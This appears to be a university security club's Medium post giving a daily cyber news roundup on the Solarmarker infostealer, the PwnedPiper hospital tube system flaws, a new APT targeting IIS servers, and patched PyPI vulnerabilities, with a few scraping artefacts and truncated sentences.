Cyber Security News — Past 24 hours | 02.08.2021

Solarmarker InfoStealer Malware Once Again Making its Way Into the Wild

Dubbed “Solarmarker,” the malware campaign is believed to be active since September 2020, with telemetry data pointing to malicious actions as early as April 2020, according to Cisco Talos.

Stack Overflow Teams

NET assembly module that serves as a system profiler and staging ground on the victim host for command-and-control communications and further malicious actions, including the deployment of information-stealing components like Jupyter and Uran . The renewed activity has also been accompanied by a shift in tactics and multiple iterations to the infection chain, even as the threat actor latched on to the age-old trick of SEO poisoning, which refers to the abuse of search engine optimization to gain more eyeballs and traction to malicious sites or make their dropper files highly visible in search engine results.

“The actor also exhibits determination in ensuring the continuation of their campaign, such as updating the encryption methods for the C2 communication in the Mars DLL after researchers had publicly picked apart previous components of the malware, in addition to the more typical strategy of cycling out the C2 infrastructure hosts.”.

Source —

PwnedPiper PTS Security Flaws Threaten 80% of Hospitals in the U.S.

Cybersecurity researchers on Monday disclosed a set of nine vulnerabilities known as «PwnedPiper» that left a widely-used pneumatic tube system vulnerable to critical attacks, including a possibility of complete takeover.

Stack Overflow Teams

«These vulnerabilities can enable an unauthenticated attacker to take over Translogic PTS stations and essentially gain complete control over the PTS network of a target hospital,» Armis researchers Ben Seri and Barak Hadad said. «This type of control could enable sophisticated and worrisome ransomware attacks, as well as allow attackers to leak sensitive hospital information».

In a nutshell, the flaws — which concern privilege escalation, memory corruption, and denial-of-service — could be abused to gain root access, achieve remote-code-execution or denial-of-service, and worse, permit an attacker to maintain persistence on compromised PTS stations via an insecure firmware upgrade procedure, leading to unauthenticated remote-code-execution.

«The potential for pneumatic tube stations to be compromised is dependent on a bad actor who has access to the facility’s information technology network and who could cause additional damage by leveraging these exploits,» Swisslog Healthcare said in an independent advisory published today.

Source —

New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits

A new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services servers to infiltrate their networks.

Stack Overflow Teams

«TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine’s memory and leaves little-to-no trace on infected targets,» the researchers said. «The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks».

Interestingly, Sygnia’s investigation into TG1021’s tactics, techniques, and procedures have unearthed «major overlaps» to those of a nation-sponsored actor named «Copy-Paste Compromises,» as detailed in an advisory released by the Australian Cyber Security Centre in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. However, a formal attribution is yet to be made.

Source —

PyPI Python Package Repository Patches Critical Supply Chain Flaw

The maintainers of Python Package Index last week issued fixes for three vulnerabilities, one among which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository.

Stack Overflow Teams

The list of three vulnerabilities is as follows -Vulnerability in Legacy Document Deletion on PyPI — An exploitable vulnerability in the mechanisms for deleting legacy documentation hosting deployment tooling on PyPI, which would allow an attacker to remove documentation for projects not under their control.
Vulnerability in Role Deletion on PyPI — An exploitable vulnerability in the mechanisms for deleting roles on PyPI was discovered by a security researcher, which would allow an attacker to remove roles for projects not under their control.

A more critical flaw concerns an issue in the GitHub Actions workflow for PyPI’s source repository named «combine-prs.yml,» resulting in a scenario wherein an adversary could obtain write permission for the main branch of the «pypa/warehouse» repository, and in the process execute malicious code on
«The vulnerabilities described in this article had a significant impact on the Python ecosystem,» RyotaK noted.

Source —

Stay Focused. Stay Vigilant.

Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT




First they begin with Us..

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

O3 Wallet Announcement Regarding Switcheo Exchange

Cyber Security News — Past 24 hours | 25.06.2021

How To Earn Rewards By Staking VEE?

{UPDATE} Guess the Heroes vs. Villains! Hack Free Resources Generator

Knownsec Blockchain Lab | Blockchain Threat Intelligence Center opened

The Hacker Class

How to join the IDO of Realms of Ethernity on Infinite Launch

Where Should a CISO Report Into?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


First they begin with Us..

More from Medium

Diplomacy Using Cyberweapons

Remote Browser Isolation — The Next Step in Endpoint Security?

[Day 23] Blue Teaming PowershELlF Magic | Advent of Cyber 3 (2021)

You Need a Password Manager